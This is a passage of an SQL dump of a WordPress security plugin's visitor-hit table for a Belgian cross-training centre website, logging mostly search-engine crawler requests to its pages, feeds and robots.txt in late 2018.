(78291, 1543160052.748154, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78292, 1543160105.798713, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78293, 1543166699.829114, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78294, 1543302563.624497, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78295, 1543302564.098548, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78296, 1543351189.309562, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78297, 1543592937.534455, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78298, 1543592938.020562, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78299, 1543656883.978617, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78300, 1543661105.784116, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78301, 1543662302.018628, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78302, 1543699376.125572, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78303, 1543699376.668815, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78304, 1543739181.283588, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78305, 1543745800.021711, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78306, 1543771139.586385, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78307, 1543843888.450285, 1123632611, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78308, 1543977981.708992, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78309, 1544251122.481861, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78310, 1544251123.080331, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78311, 1544251744.757578, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78312, 1544328208.994306, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78313, 1544363125.621720, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78314, 1544363126.179914, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78315, 1544363365.094130, 1123631301, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78316, 1544365556.437086, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78317, 1544369159.488462, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78318, 1544396892.241689, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78319, 1544434980.945641, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78320, 1544479348.270467, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78321, 1544479348.778309, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78322, 1544518609.251383, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78323, 1544554158.994760, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78324, 1544558113.155702, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/ghhgzhokpqhdmklo.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78325, 1544573412.961960, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78326, 1544668035.955013, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78327, 1544819658.703506, 2637637392, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78328, 1544931046.979615, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78329, 1544931047.826481, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78330, 1545266500.952160, 2509958044, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'http://www.google.com/', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36'),
(78331, 1545266502.467014, 2509958044, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', 'http://www.google.com/', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36'),
(78332, 1545266518.414570, 2509958044, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G930F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Mobile Safari/537.36'),
(78333, 1545270601.755469, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78334, 1545270602.373371, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78335, 1545270858.575317, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78336, 1545270859.112037, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78337, 1545270931.296575, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78338, 1545291917.458945, 2637637392, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(78339, 1545305393.760736, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78340, 1545366253.310462, 3639886537, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78341, 1545368124.157919, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(78342, 1545368124.661898, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78343, 1545404097.479628, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78344, 1545404098.077501, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78345, 1545434505.379946, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78346, 1545434525.065899, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78347, 1545434551.930289, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78348, 1545434579.932932, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78349, 1545434609.765294, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78350, 1545448062.516234, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78351, 1545448119.507603, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78352, 1545448123.324780, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78353, 1545449386.997040, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78354, 1545450824.817668, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78355, 1545458023.389008, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78356, 1545458024.036852, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78357, 1545460802.565574, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/author/admin/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78358, 1545534486.658775, 1123631301, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78359, 1545534583.840434, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78360, 1545534658.997985, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78361, 1545534668.628057, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78362, 1545557446.999874, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78363, 1545557447.470652, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78364, 1545703385.862274, 3639886537, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78365, 1545839049.765089, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78366, 1545839050.405768, 1123631752, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/qdrheutszzniqrci.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78367, 1545923867.875128, 1459547057, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'https://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),
(78368, 1545923870.021014, 1459547057, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),
(78369, 1546001343.071971, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78370, 1546001343.561994, 1123632581, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78371, 1546034198.204287, 3639886537, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78372, 1546035726.191068, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78373, 1546035808.314469, 3639886537, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(78374, 1546094214.153534, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78375, 1546094214.647650, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78376, 1546128604.002598, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78377, 1546170090.071703, 1055649381, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(78378, 1546170091.168342, 1055649381, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(78379, 1546170852.196875, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78380, 1546202484.143208, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78381, 1546202484.621397, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78382, 1546210948.532537, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(78383, 1546212149.266980, 1123631301, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
